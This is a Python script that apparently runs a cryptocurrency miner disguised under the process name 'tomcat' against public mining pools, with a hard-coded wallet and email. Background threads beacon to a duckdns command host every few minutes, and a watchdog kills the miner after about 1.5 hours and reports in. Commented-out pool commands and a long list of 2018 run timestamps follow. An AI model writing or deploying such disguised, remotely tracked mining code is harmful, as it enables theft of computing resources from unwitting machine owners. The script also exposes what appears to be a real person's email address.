import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:20:02.691325
#2018-02-17 17:09:06.626407
#2018-02-17 18:57:04.252107
#2018-02-17 20:45:07.070398
#2018-02-17 22:33:06.134333
#2018-02-18 00:17:05.191033
#2018-02-18 02:08:06.618976
#2018-02-18 03:57:06.356719
#2018-02-18 05:46:04.255090
#2018-02-18 07:39:04.902519
#2018-02-18 09:26:06.862552
#2018-02-18 11:12:05.516882
#2018-02-18 12:59:03.888275
#2018-02-18 14:46:01.880601
#2018-02-18 16:34:03.865684
#2018-02-18 18:23:06.238542
#2018-02-18 20:09:03.596240
#2018-02-18 21:56:01.367742
#2018-02-18 23:45:06.407528
#2018-02-19 01:31:07.387350
#2018-02-19 03:20:03.182675
#2018-02-19 05:05:06.382598
#2018-02-19 06:51:05.191722
#2018-02-19 08:40:09.827747
#2018-02-19 10:29:01.646582
#2018-02-19 12:17:07.625476
#2018-02-19 14:04:08.200680
#2018-02-19 15:53:09.478370
#2018-02-19 17:41:06.257875
#2018-02-19 19:29:04.724849
#2018-02-19 21:16:01.714320
#2018-02-19 23:02:06.267413
#2018-02-20 00:47:01.978169
#2018-02-20 02:37:05.535631
#2018-02-20 04:26:07.348962
#2018-02-20 06:10:09.517371
#2018-02-20 07:55:08.944419
#2018-02-20 09:41:04.097977
#2018-02-20 11:25:04.106925
#2018-02-20 13:11:06.659458
#2018-02-20 14:56:01.692685
#2018-02-20 16:41:05.492233
#2018-02-20 18:29:06.177242
#2018-02-20 20:21:05.673692
#2018-02-20 22:06:07.827428
#2018-02-20 23:46:04.202734
#2018-02-21 01:32:01.899426
#2018-02-21 03:18:07.720666
#2018-02-21 05:07:05.157718
#2018-02-21 06:55:07.387143
#2018-02-21 08:41:07.051881
#2018-02-21 10:26:05.840912
#2018-02-21 12:13:08.659491
#2018-02-21 14:02:01.800677
#2018-02-21 15:47:04.217146
#2018-02-21 17:39:07.462092
#2018-02-21 19:25:01.355339
#2018-02-21 21:14:08.113405
#2018-02-21 23:01:04.420355
#2018-02-22 00:50:05.679815
#2018-02-22 02:37:01.575010
#2018-02-22 04:23:02.147473
#2018-02-22 06:11:02.054168
#2018-02-22 07:55:09.206228
#2018-02-22 09:43:05.718299
#2018-02-22 11:28:03.543891
#2018-02-22 13:13:08.107869
#2018-02-22 15:03:03.195168
#2018-02-22 16:46:11.685087
#2018-02-22 18:32:04.722663
#2018-02-22 20:25:09.312718
#2018-02-22 22:13:01.487284
#2018-02-22 23:58:06.823877
#2018-02-23 01:46:05.421505
#2018-02-23 03:36:04.365826
#2018-02-23 05:20:01.756372
#2018-02-23 07:05:06.831210
#2018-02-23 08:54:01.612232
#2018-02-23 11:14:08.084699
#2018-02-23 13:08:05.834856
#2018-02-23 14:52:01.560684
#2018-02-23 16:40:09.219632
#2018-02-23 18:26:08.040368
#2018-02-23 20:10:10.045743
#2018-02-23 21:59:06.259470
#2018-02-23 23:48:06.097523
#2018-02-24 01:34:04.854245
#2018-02-24 03:22:07.675133
#2018-02-24 05:07:07.574747
#2018-02-24 06:56:03.750359
#2018-02-24 08:46:06.875293
#2018-02-24 10:47:01.961756
#2018-02-24 12:34:03.580762
#2018-02-24 14:22:04.495227
#2018-02-24 16:09:03.705705
#2018-02-24 18:00:01.527075
#2018-02-24 19:48:07.672956
#2018-02-24 21:33:01.996984
#2018-02-25 00:19:04.899756
#2018-02-25 03:27:07.275705
#2018-02-25 06:05:07.448061
#2018-02-25 10:41:01.384622
#2018-02-25 12:14:02.173352
#2018-02-25 14:26:02.033157
#2018-02-25 16:02:02.019356